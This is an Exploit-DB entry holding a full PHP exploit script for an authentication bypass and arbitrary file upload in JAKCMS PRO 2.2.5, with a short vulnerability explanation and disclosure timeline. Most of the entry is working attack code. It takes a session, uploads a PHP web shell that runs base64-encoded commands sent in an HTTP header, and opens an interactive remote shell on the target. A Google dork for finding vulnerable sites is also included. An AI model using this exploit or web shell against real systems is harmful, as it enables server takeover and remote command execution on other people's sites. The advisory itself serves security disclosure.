JAKCMS PRO 2.2.5 - Arbitrary File Upload

EDB-ID:

17882

CVE:


EDB Verified:

Author:

EgiX

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2011-09-22

Vulnerable App: 
# Exploit Title: JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit
# Google Dork: "Powered By JAKCMS"
# Date: 21/09/2011
# Author: EgiX
# Software Link: http://www.jakcms.com/
# Version: 2.2.5
# Tested on: Windows 7 and Debian 6.0.2

<?php



/*

    --------------------------------------------------------

    JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

    --------------------------------------------------------

    

    author..........: EgiX

    mail............: n0b0d13s[at]gmail[dot]com

    software link...: http://www.jakcms.com/

    

    This PoC was written for educational purpose. Use it at your own risk.

    Author will be not responsible for any damage.

    

    [-] vulnerable code in /js/editor/plugins/jakadminexplorer/php/session.php

    

    119.    if ($SESSION["check_session_variable"] != "") {

    120.    

    121.        // Session Starten

    122.        session_start();

    123.    

    124.        // Session-Variable überprüfen

    125.        if (!isset($_SESSION[$SESSION["check_session_variable"]])) {

    126.            include("error.php");

    127.            die;

    128.        }

    129.    }

    

    This authentication schema could be bypassed due to an attacker might be able to start a session accessing to /index.php that set

    for e.g. the "jak_lastURL" session variable, so could be set $SESSION["check_session_variable"] to bypass the check at line 125.

    Successful exploitation allows attackers access to plugins functionality (see /js/editor/plugins/jakadminexplorer/php/action.php),

    in this way an attacker could be able to "delete", "create", "rename" any folder/file into webserver or upload arbitrary files.

    The same vulnerability afflicts also jakadminimage, jakusrexplorer and jakusrimage plugins. 

    

    [-] Disclosure timeline:

    

    [15/09/2011] - Vulnerability discovered

    [16/09/2011] - Issue reported to http://www.jakcms.com/tracker/t/61/security-flaw-imagefilemanager

    [16/09/2011] - Vendor fix released in version 2.2.6

    [21/09/2011] - Public disclosure

    

*/



error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);



function http_send($host, $packet)

{

    if (!($sock = fsockopen($host, 80)))

        die("\n[-] No response from {$host}:80\n");

 

    fputs($sock, $packet);

    return stream_get_contents($sock);

}



function RC4($data)

{

    $key = "asvKHQFkoobdwdin4bi30xzb003ufkxS3Fu3HArhBnlIk5pr3D6OGSKvUbso1rtne42VekxwUmOtPgmcA1iYC6lrpWP7HXq6VdB8EnbzR0L8rIHMqSY8mIi0o3ROzZWe";

    $s = range(0, 256);

    $j = 0;



    for ($i = 0; $i < 256; $i++)

    {

        $j = ($j + $s[$i] + ord($key[$i % strlen($key)])) % 256;

        $x = $s[$i];

        $s[$i] = $s[$j];

        $s[$j] = $x;

    }

    

    $i = $j = 0;

    $ct = "";

    

    for ($y = 0; $y < strlen($data); $y++)

    {

        $i = ($i + 1) % 256;

        $j = ($j + $s[$i]) % 256;

        $x = $s[$i];

        $s[$i] = $s[$j];

        $s[$j] = $x;

        $ct .= $data[$y] ^ chr($s[($s[$i] + $s[$j]) % 256]);

    }

    

    return $ct;

}



print "\n+------------------------------------------------------------------+";

print "\n| JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit by EgiX |";

print "\n+------------------------------------------------------------------+\n";

 

if ($argc < 3)

{

    print "\nUsage......: php $argv[0] <host> <path>\n";

    print "\nExample....: php $argv[0] localhost /";

    print "\nExample....: php $argv[0] localhost /jakcms/\n";

    die();

}



$host = $argv[1];

$path = $argv[2];



$packet  = "GET {$path} HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Connection: close\r\n\r\n";



preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);

$sid = $m[1];



$payload  = "--o0oOo0o\r\n";

$payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n";

$payload .= "--o0oOo0o\r\n";

$payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n";

$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";

$payload .= "--o0oOo0o--\r\n";



$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));



$packet  = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cookie: PHPSESSID={$sid}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";

$packet .= "Connection: close\r\n\r\n";

$packet .= $payload;



if (preg_match("/Error/", http_send($host, $packet))) die("\n[-] Upload failed!\n");



$packet  = "GET {$path}cache/sh.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cmd: %s\r\n";

$packet .= "Connection: close\r\n\r\n";

    

while(1)

{

    print "\njakcms-shell# ";

    if (($cmd = trim(fgets(STDIN))) == "exit") break;

    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");

}



?>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services